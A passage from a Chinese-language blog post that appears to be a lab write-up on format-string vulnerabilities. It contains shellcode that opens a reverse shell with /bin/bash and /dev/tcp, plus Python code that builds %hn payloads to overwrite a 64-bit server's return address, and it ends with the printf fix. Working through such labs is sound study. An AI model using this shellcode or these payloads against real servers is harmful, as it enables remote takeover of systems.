<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 32-bit Generic Shellcode </span></span><br><span class="line">shellcode_32 = (</span><br><span class="line">   <span class="string">&quot;\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b&quot;</span></span><br><span class="line">   <span class="string">&quot;\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54&quot;</span></span><br><span class="line">   <span class="string">&quot;\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff&quot;</span></span><br><span class="line">   <span class="string">&quot;/bin/bash*&quot;</span></span><br><span class="line">   <span class="string">&quot;-c*&quot;</span></span><br><span class="line">   <span class="comment"># The * in this line serves as the position marker         *</span></span><br><span class="line">   <span class="comment">#&quot;/bin/ls -l; echo &#x27;===== Success! ======&#x27;                  *&quot;</span></span><br><span class="line">   <span class="comment">#	change:</span></span><br><span class="line">   <span class="string">&quot;/bin/bash -i &gt; /dev/tcp/10.0.2.6/9090 0&lt;&amp;1 2&gt;&amp;1           *&quot;</span></span><br><span class="line">   <span class="string">&quot;AAAA&quot;</span>   <span class="comment"># Placeholder for argv[0] --&gt; &quot;/bin/bash&quot;</span></span><br><span class="line">   <span class="string">&quot;BBBB&quot;</span>   <span class="comment"># Placeholder for argv[1] --&gt; &quot;-c&quot;</span></span><br><span class="line">   <span class="string">&quot;CCCC&quot;</span>   <span class="comment"># Placeholder for argv[2] --&gt; the command string</span></span><br><span class="line">   <span class="string">&quot;DDDD&quot;</span>   <span class="comment"># Placeholder for argv[3] --&gt; NULL</span></span><br><span class="line">).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/12/03/pYvAgzn9wOa78XW.png" alt="image-20211203152637683"></p>
<p>在10.9.0.6 docker compose上接收即可。</p>
<h2 id="TASK5-攻击64位服务器"><a href="#TASK5-攻击64位服务器" class="headerlink" title="TASK5 攻击64位服务器"></a>TASK5 攻击64位服务器</h2><p>实验建立的64位目标ip:10.9.0.6，运行64位的format程序，同上发送一个hello：</p>
<p><img src="https://i.loli.net/2021/12/03/KgiUSud1TakyrL5.png" alt="image-20211203152925001"></p>
<p>64位地址的挑战是地址中的0，64位地址高位必含有0x00，这样我们的格式化字符串就不能放地址，因为遇到0之后printf函数停止解析，这里遇到0和之前缓冲区溢出攻击不同，因为缓冲区溢出是strcpy遇到0就停止复制，这里我们没有内存复制，所以我们可以在输入中放入0，但是放在哪是个问题。根据printf函数给的一个特性，用k$可自由指定特定位置的参数，通过这个可以来进行64位的攻击。</p>
<p>64位下可以把带有0x00的地址后置，放在构造的payload后面，可以避免读取0x00从而停止。</p>
<p>同样的来打印我们第一个参数出现位置：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">s = <span class="string">&quot;%llx.&quot;</span>*<span class="number">34</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">8</span>:<span class="number">8</span>+len(fmt)] = fmt</span><br><span class="line"></span><br><span class="line">number = <span class="number">0x1234567812345678</span></span><br><span class="line">content[<span class="number">0</span>:<span class="number">8</span>]  =  (number).to_bytes(<span class="number">8</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/12/03/OYT59Xru3jgli4z.png" alt="image-20211203155134600"></p>
<p>在第34个”%llx”可打印出我们指定的参数值。接下来可计算64位内存布局。</p>
<p><strong>64位myprintf返回地址所在地址值：0x00007fffffffdf48</strong></p>
<p><strong>输入buffer地址值：0x00007fffffffe000</strong></p>
<p>要运行恶意代码，同样可以计算出可变指针到达返回地址处需要11个%llx，同32位，让offset=1000，那么需要修改的返回地址值为：0x00007ffffffe3e8，0x00007ffffffe3e8可以划分成3个2字节进行修改，即0xe3e8在0x00007fffffffdf48，0xffff在0x00007fffffffdf44a和0x7fff 在 0x00007fffffffdf44c。</p>
<p>根据大小按照顺序修改，这部分和TASK4一样，然后指定修改第41个参数，由于首先在可变指针到达buf之前需要33个参数，现在地址后置，首先填充格式化字符串，要跳过格式化字符串多出的6个参数，那么第一个要修改的地址应该在第39个参数，所以依次修改41,39,40个参数，按照大小排序。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">number = <span class="number">0x7fffffffdf4c</span></span><br><span class="line">content[<span class="number">56</span>:<span class="number">64</span>]  =  (number).to_bytes(<span class="number">8</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">number = <span class="number">0x7fffffffdf4a</span></span><br><span class="line">content[<span class="number">48</span>:<span class="number">56</span>]  =  (number).to_bytes(<span class="number">8</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">number = <span class="number">0x7fffffffdf48</span></span><br><span class="line">content[<span class="number">40</span>:<span class="number">48</span>]  =  (number).to_bytes(<span class="number">8</span>,byteorder=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line">s = <span class="string">&quot;%32767x%41$hn%25577x%39$hn%7191x%40$hn&quot;</span></span><br><span class="line">fmt  = (s).encode(<span class="string">&#x27;latin-1&#x27;</span>)</span><br><span class="line">content[<span class="number">0</span>:<span class="number">0</span>+len(fmt)] = fmt</span><br></pre></td></tr></table></figure>

<p>成功攻击：</p>
<p><img src="https://s2.loli.net/2021/12/04/T1AWNyB3GZzHnr9.png" alt="image-20211204165044396"></p>
<h2 id="TASK6-修复问题"><a href="#TASK6-修复问题" class="headerlink" title="TASK6 修复问题"></a>TASK6 修复问题</h2><p>​    将printf修改成printf(“%s”,msg)即可</p>

    </div>
    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag"></i> Linux</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/30/linux-semandsh/" rel="prev" title="代码：Linux下信号量(sys/sem.h)">
      <i class="fa fa-chevron-left"></i> 代码：Linux下信号量(sys/sem.h)
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/12/04/cppadv-this/" rel="next" title="探究C++语法细节 this和inline细节">
      探究C++语法细节 this和inline细节 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="nav-number">1.</span> <span class="nav-text">实验环境准备</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK1-%E7%A8%8B%E5%BA%8F%E5%B4%A9%E6%BA%83"><span class="nav-number">2.</span> <span class="nav-text">TASK1 程序崩溃</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK2-%E6%89%93%E5%8D%B0%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%A8%8B%E5%BA%8F%E5%86%85%E5%AD%98"><span class="nav-number">3.</span> <span class="nav-text">TASK2 打印服务器程序内存</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-%E6%A0%88%E6%95%B0%E6%8D%AE"><span class="nav-number">3.1.</span> <span class="nav-text">A.栈数据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-%E5%A0%86%E6%95%B0%E6%8D%AE"><span class="nav-number">3.2.</span> <span class="nav-text">B.堆数据</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK3-%E4%BF%AE%E6%94%B9%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%A8%8B%E5%BA%8F%E5%86%85%E5%AD%98"><span class="nav-number">4.</span> <span class="nav-text">TASK3 修改服务器程序内存</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-%E4%BF%AE%E6%94%B9%E5%80%BC"><span class="nav-number">4.1.</span> <span class="nav-text">A.修改值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-%E6%94%B9%E6%88%900x5000"><span class="nav-number">4.2.</span> <span class="nav-text">B.改成0x5000</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#C-%E6%94%B9%E6%88%900xAABBCCDD"><span class="nav-number">4.3.</span> <span class="nav-text">C.改成0xAABBCCDD</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK4-%E6%B3%A8%E5%85%A5%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81"><span class="nav-number">5.</span> <span class="nav-text">TASK4 注入恶意代码</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AE%A4%E8%AF%86%E6%A0%88%E5%B8%83%E5%B1%80"><span class="nav-number">5.1.</span> <span class="nav-text">认识栈布局</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Q1%EF%BC%9A2%E5%92%8C3%E7%9A%84%E5%86%85%E5%AD%98%E5%9C%B0%E5%9D%80%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-number">5.1.1.</span> <span class="nav-text">Q1：2和3的内存地址是什么</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Q2%EF%BC%9A%E9%9C%80%E8%A6%81%E5%A4%9A%E5%B0%91%E4%B8%AA-x%E8%AE%A9%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8F%82%E6%95%B0%E6%8C%87%E9%92%88%E7%A7%BB%E5%8A%A8%E5%88%B03%EF%BC%9F"><span class="nav-number">5.1.2.</span> <span class="nav-text">Q2：需要多少个%x让格式化字符串参数指针移动到3？</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#shellcode"><span class="nav-number">5.2.</span> <span class="nav-text">shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Task"><span class="nav-number">5.3.</span> <span class="nav-text">Task</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%90%91shell"><span class="nav-number">5.3.1.</span> <span class="nav-text">反向shell</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK5-%E6%94%BB%E5%87%BB64%E4%BD%8D%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">6.</span> <span class="nav-text">TASK5 攻击64位服务器</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK6-%E4%BF%AE%E5%A4%8D%E9%97%AE%E9%A2%98"><span class="nav-number">7.</span> <span class="nav-text">TASK6 修复问题</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Sekla"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Sekla</p>
  <div class="site-description" itemprop="description">Sekla</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">100</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ShenTiao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ShenTiao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:584892986@qq.com" title="E-Mail → mailto:584892986@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1416875904&auto=0&height=66"></iframe>
      
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sekla</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">288k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">4:22</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":250,"height":500},"mobile":{"show":false},"react":{"opacity":0.9},"log":false});</script></body>
</html>

<script type="text/javascript" src="/js/src/love.js"></script>
